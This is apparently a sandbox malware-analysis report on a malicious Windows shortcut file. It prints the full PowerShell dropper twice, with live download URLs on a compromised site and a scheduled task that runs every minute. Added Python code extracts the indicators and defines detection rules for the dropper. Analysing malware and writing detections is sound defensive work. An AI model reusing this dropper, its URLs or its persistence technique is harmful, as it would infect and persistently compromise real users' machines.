
Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    03/12/2024, 11:14 UTC

General

  • Target

    22_11_2024_stmnt.lnk

  • Size

    3KB

  • MD5

    ef8150f41db3c25684ff13470182898f

  • SHA1

    6a10b98d8cd2fb0fa641d282ea30fc196638b8cd

  • SHA256

    e02e837f8b43f14dd1de0c924fb9c7c2ead99fe1589bfb5126f120be5bc8599b

  • SHA512

    d7937781c09595c1b0c4a058929579a7499b7e28c67ef48f3ab6704a4c3b2b80cea38a1452f275e0b1205ddbabeeceaadf3c3fcd84be8fb6270904859eeff6c3

Score
10/10

Malware Config

Extracted

Language: ps1
Source (the extracted one-liner, broken at statement boundaries with comments added; the verbatim command line is in the Processes section below):

    # Force TLS 1.2 for the WebClient; it is not the default on older .NET / Windows 7 hosts.
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
    $s9iJkyOlgfNn3 = New-Object Net.WebClient;
    # First URL: fetched into memory as bytes and decoded below as the start of the task command.
    $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php');
    # Second URL: written to EB3Vk0QhrcN4wn.js, relative to the process's current directory.
    $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js');
    # Persistence: task HAoyOEGl0 runs every minute. Its command is
    # <decoded first download> + %TMP%\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
    # (the file name repeated twice by the string multiplication); the decoded prefix is not in this report.
    schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;
URLs
ps1.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php

exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php

Signatures

  • Blocklisted process makes network request (4 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
    Using powershell.exe command.
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (3 IoCs)

Processes

  • C:\Windows\system32\cmd.exe (PID 1724)
    cmd /c C:\Users\Admin\AppData\Local\Temp\22_11_2024_stmnt.lnk
    • Suspicious use of WriteProcessMemory
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2088, child of 1724)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
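The dropper recorded above is one PowerShell statement list: it forces TLS 1.2, pulls the first URL into a byte array, writes the second URL to EB3Vk0QhrcN4wn.js in the current directory, and registers a scheduled task named HAoyOEGl0 that fires every minute with a command assembled at runtime from the decoded first download plus %TMP%\EB3Vk0QhrcN4wn.js. The Python below is an added example, not part of the tria.ge report or of the sample: it extracts those IoCs from the recorded command line and applies a few process-creation detection rules to events constructed from the report's process tree plus one benign administrative command. The Sysmon-style field names, the parent image of cmd.exe (not shown in the report) and the benign command are assumptions.

```python
"""IoC extraction and detection for the PowerShell LNK dropper in this report.
Added example; not part of the tria.ge report or of the sample."""
import re

# Command lines as recorded in the report's process tree (PID 1724 and PID 2088).
CMD_LNK = r"cmd /c C:\Users\Admin\AppData\Local\Temp\22_11_2024_stmnt.lnk"
PS_DROPPER = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman '
    "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; "
    "$s9iJkyOlgfNn3 = New-Object Net.WebClient; "
    "$cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); "
    "$s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); "
    "schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;"
)

URL_RE = re.compile(r"https?://[^\s'\"()]+")
DOWNLOADFILE_RE = re.compile(r"\.DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)")
SCHTASKS_RE = re.compile(r"\bschtasks\s+/create\b([^;]*)", re.IGNORECASE)
SWITCH_SPLIT_RE = re.compile(r"\s+/([A-Za-z]+)\b")
# powershell.exe accepts any unambiguous prefix of -Command; this sample uses "-comman".
TRUNCATED_COMMAND_RE = re.compile(r"(?i)\s-(?:c|co|com|comm|comma|comman)\s")


def extract_urls(cmdline):
    return URL_RE.findall(cmdline)


def dropped_files(cmdline):
    """(url, local path) pairs written by WebClient.DownloadFile. A relative path such as
    'EB3Vk0QhrcN4wn.js' lands in the process's current directory; the task command
    below assumes that directory is %TMP%."""
    return DOWNLOADFILE_RE.findall(cmdline)


def parse_schtasks(cmdline):
    """Map /switch -> value for an inline 'schtasks /create', or {} if absent.
    Splitting on ' /xx' boundaries keeps the /tr value intact although it contains
    spaces and parentheses; the /tr here is a PowerShell expression whose first part
    (the decoded first download) is not in the report."""
    m = SCHTASKS_RE.search(cmdline)
    if not m:
        return {}
    parts = SWITCH_SPLIT_RE.split(" " + m.group(1))
    return {parts[i].lower(): parts[i + 1].strip() for i in range(1, len(parts) - 1, 2)}


def interval_seconds(task):
    """Seconds between runs for /sc minute|hourly|daily with modifier /mo; None otherwise."""
    unit = {"minute": 60, "hourly": 3600, "daily": 86400}.get(task.get("sc", "").lower())
    return None if unit is None else unit * int(task.get("mo", "1"))


def detect(event):
    """Names of the rules a process-creation event matches.
    event: {'image', 'parent_image', 'cmdline'}, a constructed Sysmon-style record."""
    hits = []
    image = event["image"].lower()
    parent = event.get("parent_image", "").lower()
    cmdline = event["cmdline"]
    low = cmdline.lower()
    if image.endswith("cmd.exe") and low.rstrip().endswith(".lnk"):
        hits.append("cmd_launches_lnk")
    if image.endswith("powershell.exe"):
        if parent.endswith("cmd.exe"):
            hits.append("powershell_spawned_by_cmd")
        if "net.webclient" in low and any(m in low for m in ("downloadfile", "downloaddata", "downloadstring")):
            hits.append("powershell_webclient_download")
        if TRUNCATED_COMMAND_RE.search(cmdline):
            hits.append("powershell_truncated_command_switch")
        task = parse_schtasks(cmdline)
        secs = interval_seconds(task) if task else None
        if secs is not None and secs <= 300:
            hits.append("powershell_schtasks_short_interval")
    return hits


# Constructed events: the report's two processes (the parent of cmd.exe is not in the
# report and is assumed) plus one benign administrative command that must not fire.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\system32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe", "cmdline": CMD_LNK},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\system32\cmd.exe", "cmdline": PS_DROPPER},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell.exe -Command "Get-ScheduledTask | Select-Object TaskName"'},
]


def scan(events):
    """[(image basename, matched rules)] for every event matching at least one rule."""
    return [(e["image"].rsplit("\\", 1)[-1], detect(e)) for e in events if detect(e)]


if __name__ == "__main__":
    print("URLs:", extract_urls(PS_DROPPER))
    print("dropped:", dropped_files(PS_DROPPER))
    task = parse_schtasks(PS_DROPPER)
    print("task:", task["tn"], "every", interval_seconds(task), "s")
    for name, hits in scan(SAMPLE_EVENTS):
        print(name, "->", ", ".join(hits))
```

Two points worth carrying into real rules: a detection that matches only the literal string -Command misses this sample, because powershell.exe accepts -comman as an unambiguous prefix and still ran the script (the network requests and PowerShell signature above confirm execution); and this run shows no schtasks.exe child under PID 2088 and no dropped EB3Vk0QhrcN4wn.js in the Downloads list, so the persistence step itself was not observed in the sandbox.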

Network

  • DNS via powershell.exe to 8.8.8.8:53
    Request:  www.italialife24.it IN A
    Response: www.italialife24.it IN CNAME italialife24.it
              italialife24.it IN A 46.254.34.201
  • 46.254.34.201:443  www.italialife24.it  tls  powershell.exe
    four identical connections, each: 353 B sent, 219 B received, 5 / 5 packets
  • 8.8.8.8:53  www.italialife24.it  dns  powershell.exe
    65 B sent, 95 B received, 1 / 1 packets
    DNS request www.italialife24.it, response 46.254.34.201

MITRE ATT&CK Enterprise v15


Downloads

  • memory/2088-38-0x000007FEF601E000-0x000007FEF601F000-memory.dmp (4KB)
  • memory/2088-39-0x000000001B5D0000-0x000000001B8B2000-memory.dmp (2.9MB)
  • memory/2088-41-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp (9.6MB)
  • memory/2088-42-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp (9.6MB)
  • memory/2088-40-0x0000000002660000-0x0000000002668000-memory.dmp (32KB)
  • memory/2088-44-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp (9.6MB)
  • memory/2088-43-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp (9.6MB)
  • memory/2088-45-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp (9.6MB)
  • memory/2088-46-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp (9.6MB)
  • memory/2088-47-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp (9.6MB)
